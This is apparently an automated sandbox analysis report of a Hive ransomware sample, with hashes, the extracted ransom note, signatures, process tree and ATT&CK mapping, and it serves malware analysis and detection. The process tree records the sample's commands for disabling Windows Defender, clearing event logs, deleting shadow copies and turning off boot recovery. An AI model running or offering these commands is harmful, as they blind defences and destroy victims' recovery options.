Analysis

  • max time kernel
    1s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    12-02-2024 07:56

General

  • Target

    zi1ysv64h.exe

  • Size

    3.3MB

  • MD5

    5384c6825a5707241c11d78529dbbfee

  • SHA1

    85f5587e8ad534c2e5de0e72450b61ebda93e4fd

  • SHA256

    3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21

  • SHA512

    856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f

  • SSDEEP

    49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno

Malware Config

Extracted

Path

C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\K8zJ_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at you will need to purchase our decryption software. Please contact our sales department at: Login: Password: To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.2o4xo files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe
    "C:\Users\Admin\AppData\Local\Temp\zi1ysv64h.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2352
    • C:\Windows\system32\reg.exe
      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2⤵
        PID:2380
      • C:\Windows\system32\reg.exe
        reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        2⤵
          PID:1444
        • C:\Windows\system32\wevtutil.exe
          wevtutil.exe cl system
          2⤵
          • Clears Windows event logs
          PID:2360
        • C:\Windows\System32\Wbem\wmic.exe
          wmic.exe SHADOWCOPY /nointeractive
          2⤵
            PID:1552
          • C:\Windows\system32\cmd.exe
            cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
            2⤵
              PID:2572
            • C:\Windows\system32\cmd.exe
              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
              2⤵
                PID:328
              • C:\Windows\system32\cmd.exe
                cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                2⤵
                  PID:2072
                • C:\Windows\system32\bcdedit.exe
                  bcdedit.exe /set {default} recoveryenabled no
                  2⤵
                  • Modifies boot configuration data using bcdedit
                  PID:3036
                • C:\Windows\system32\bcdedit.exe
                  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                  2⤵
                  • Modifies boot configuration data using bcdedit
                  PID:1224
                • C:\Windows\System32\Wbem\wmic.exe
                  wmic.exe shadowcopy delete
                  2⤵
                    PID:1868
                  • C:\Windows\system32\wevtutil.exe
                    wevtutil.exe cl application
                    2⤵
                    • Clears Windows event logs
                    PID:2168
                  • C:\Windows\system32\wevtutil.exe
                    wevtutil.exe cl security
                    2⤵
                    • Clears Windows event logs
                    PID:1308
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin.exe delete shadows /all /quiet
                    2⤵
                    • Interacts with shadow copies
                    PID:452
                  • C:\Windows\system32\reg.exe
                    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                    2⤵
                      PID:2176
                    • C:\Windows\system32\reg.exe
                      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                      2⤵
                        PID:1016
                      • C:\Windows\system32\reg.exe
                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                        2⤵
                          PID:912
                        • C:\Windows\system32\reg.exe
                          reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                          2⤵
                            PID:2532
                          • C:\Windows\system32\reg.exe
                            reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                            2⤵
                              PID:1732
                            • C:\Windows\system32\reg.exe
                              reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                              2⤵
                                PID:2908
                              • C:\Windows\system32\reg.exe
                                reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                2⤵
                                  PID:1424
                                • C:\Windows\system32\reg.exe
                                  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                  2⤵
                                    PID:704
                                  • C:\Windows\system32\reg.exe
                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                    2⤵
                                      PID:784
                                    • C:\Windows\system32\reg.exe
                                      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                      2⤵
                                        PID:596
                                      • C:\Windows\system32\reg.exe
                                        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                        2⤵
                                          PID:2220
                                        • C:\Windows\system32\schtasks.exe
                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                          2⤵
                                            PID:2436
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                            2⤵
                                              PID:1480
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                              2⤵
                                                PID:2056
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                2⤵
                                                  PID:2452
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                  2⤵
                                                    PID:2420
                                                  • C:\Windows\system32\reg.exe
                                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                    2⤵
                                                      PID:2344
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                      2⤵
                                                        PID:332
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                        2⤵
                                                          PID:360
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:1592
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:2456
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:2140
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:2036
                                                                • C:\Windows\system32\reg.exe
                                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                  2⤵
                                                                    PID:1884
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                    2⤵
                                                                      PID:1900
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                      2⤵
                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                      PID:1748
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:1788
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                        2⤵
                                                                          PID:2460
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                          2⤵
                                                                            PID:2156
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                            2⤵
                                                                              PID:2288
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                              2⤵
                                                                                PID:2748
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "WebClient" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:2632
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "wbengine" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:1360
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "VSS" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:2132
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "UI0Detect" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:920
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "SstpSvc" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:2408
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "SDRSVC" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:2980
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "SamSs" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:2636
                                                                              • C:\Windows\system32\sc.exe
                                                                                sc.exe config "NetMsmqActivator" start= disabled
                                                                                2⤵
                                                                                • Launches sc.exe
                                                                                PID:2580
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "WebClient" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2816
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "wbengine" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2772
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "VSS" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2824
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "UI0Detect" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2836
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "SstpSvc" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3060
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "SDRSVC" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2716
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "SamSs" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:2792
                                                                              • C:\Windows\system32\net.exe
                                                                                net.exe stop "NetMsmqActivator" /y
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:1828
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop "SamSs" /y
                                                                              1⤵
                                                                                PID:2912
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop "SstpSvc" /y
                                                                                1⤵
                                                                                  PID:2264
                                                                                • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                  1⤵
                                                                                  • Deletes Windows Defender Definitions
                                                                                  PID:644
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                  1⤵
                                                                                    PID:3044
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                    1⤵
                                                                                      PID:2264
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 stop "WebClient" /y
                                                                                      1⤵
                                                                                        PID:2560
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 stop "wbengine" /y
                                                                                        1⤵
                                                                                          PID:2488
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 stop "VSS" /y
                                                                                          1⤵
                                                                                            PID:1664
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 stop "UI0Detect" /y
                                                                                            1⤵
                                                                                              PID:2800
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 stop "SDRSVC" /y
                                                                                              1⤵
                                                                                                PID:2572
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 stop "NetMsmqActivator" /y
                                                                                                1⤵
                                                                                                  PID:2768

                                                                                                Network

                                                                                                MITRE ATT&CK Matrix ATT&CK v13

                                                                                                Execution

                                                                                                Command and Scripting Interpreter

                                                                                                1
                                                                                                T1059

                                                                                                Persistence

                                                                                                Create or Modify System Process

                                                                                                1
                                                                                                T1543

                                                                                                Windows Service

                                                                                                1
                                                                                                T1543.003

                                                                                                Privilege Escalation

                                                                                                Create or Modify System Process

                                                                                                1
                                                                                                T1543

                                                                                                Windows Service

                                                                                                1
                                                                                                T1543.003

                                                                                                Defense Evasion

                                                                                                Impair Defenses

                                                                                                2
                                                                                                T1562

                                                                                                Disable or Modify Tools

                                                                                                1
                                                                                                T1562.001

                                                                                                Modify Registry

                                                                                                1
                                                                                                T1112

                                                                                                Indicator Removal

                                                                                                3
                                                                                                T1070

                                                                                                File Deletion

                                                                                                2
                                                                                                T1070.004

                                                                                                Impact

                                                                                                Inhibit System Recovery

                                                                                                3
                                                                                                T1490

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\K8zJ_HOW_TO_DECRYPT.txt
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  f939d786e1fb30d287357d553719cf88

                                                                                                  SHA1

                                                                                                  b5001e66047bb37310e8b9c78fef2d1ef6443e1f

                                                                                                  SHA256

                                                                                                  5f3f1382a950d3c94afafb319c58b2b3731bce694966973685aad6bf9b156cad

                                                                                                  SHA512

                                                                                                  8da927a8e9425e10a29daeb4b93f66484eca789805dd66a29bfee52b59c2a6df9895bc5dfd814eca788ed27b53463cdd4e8983ff2fc04496d5998a4193f3c2a9

                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TN07QX7PKP6MZ4M28FK3.temp
                                                                                                  Filesize

                                                                                                  7KB

                                                                                                  MD5

                                                                                                  79ca85384748f3b8508ba6ba252a6f75

                                                                                                  SHA1

                                                                                                  9365a5ddfdfcedfab26e8223e3b230bf579458ff

                                                                                                  SHA256

                                                                                                  70d6ddc51fb53a49c31106a3d6190441fd7d75141d3dd856d608306e71676260

                                                                                                  SHA512

                                                                                                  73a5585bfdcb17a8af259df21f81b9c6d488bf9dc62fe8f80371b692711056ce1d9ff33a7cfa0baca8b3eaa0a6388baa63127bd5340ecbe17353c98ef9eee270

                                                                                                • C:\temp3.swap.2o4xo
                                                                                                  Filesize

                                                                                                  234KB

                                                                                                  MD5

                                                                                                  54dd80ccdde9a27110aa9bca91fee9f8

                                                                                                  SHA1

                                                                                                  632f979b52ee6dfcf2648da427116491d265955a

                                                                                                  SHA256

                                                                                                  01dbde8b34cf3e1d0d3749d93c1fb5bd7c09394dd4a2f4144261d4fca5af0a40

                                                                                                  SHA512

                                                                                                  5cef3a0c8af01d0fb07d3d6efbc2109da834c4a15530edcaebe75e9b0948b4eaf6174ff3af9d71758db93bdb1969fe163849d694607b57e7bcbc5ebcad76f5e9

                                                                                                • memory/2264-21-0x0000000001C80000-0x0000000001C88000-memory.dmp
                                                                                                  Filesize

                                                                                                  32KB

                                                                                                • memory/2264-27-0x0000000002A20000-0x0000000002AA0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/2264-24-0x000007FEF4DB0000-0x000007FEF574D000-memory.dmp
                                                                                                  Filesize

                                                                                                  9.6MB

                                                                                                • memory/2264-25-0x0000000002A20000-0x0000000002AA0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/2264-20-0x000000001B7D0000-0x000000001BAB2000-memory.dmp
                                                                                                  Filesize

                                                                                                  2.9MB

                                                                                                • memory/2264-22-0x000007FEF4DB0000-0x000007FEF574D000-memory.dmp
                                                                                                  Filesize

                                                                                                  9.6MB

                                                                                                • memory/2264-23-0x0000000002A20000-0x0000000002AA0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/2264-26-0x0000000002A20000-0x0000000002AA0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/2264-28-0x000007FEF4DB0000-0x000007FEF574D000-memory.dmp
                                                                                                  Filesize

                                                                                                  9.6MB

                                                                                                • memory/3044-13-0x0000000002A60000-0x0000000002AE0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/3044-10-0x0000000002A60000-0x0000000002AE0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/3044-14-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
                                                                                                  Filesize

                                                                                                  9.6MB

                                                                                                • memory/3044-7-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
                                                                                                  Filesize

                                                                                                  2.9MB

                                                                                                • memory/3044-12-0x0000000002A60000-0x0000000002AE0000-memory.dmp
                                                                                                  Filesize

                                                                                                  512KB

                                                                                                • memory/3044-11-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
                                                                                                  Filesize

                                                                                                  9.6MB

                                                                                                • memory/3044-8-0x0000000001FF0000-0x0000000001FF8000-memory.dmp
                                                                                                  Filesize

                                                                                                  32KB

                                                                                                • memory/3044-9-0x000007FEF5750000-0x000007FEF60ED000-memory.dmp
                                                                                                  Filesize

                                                                                                  9.6MB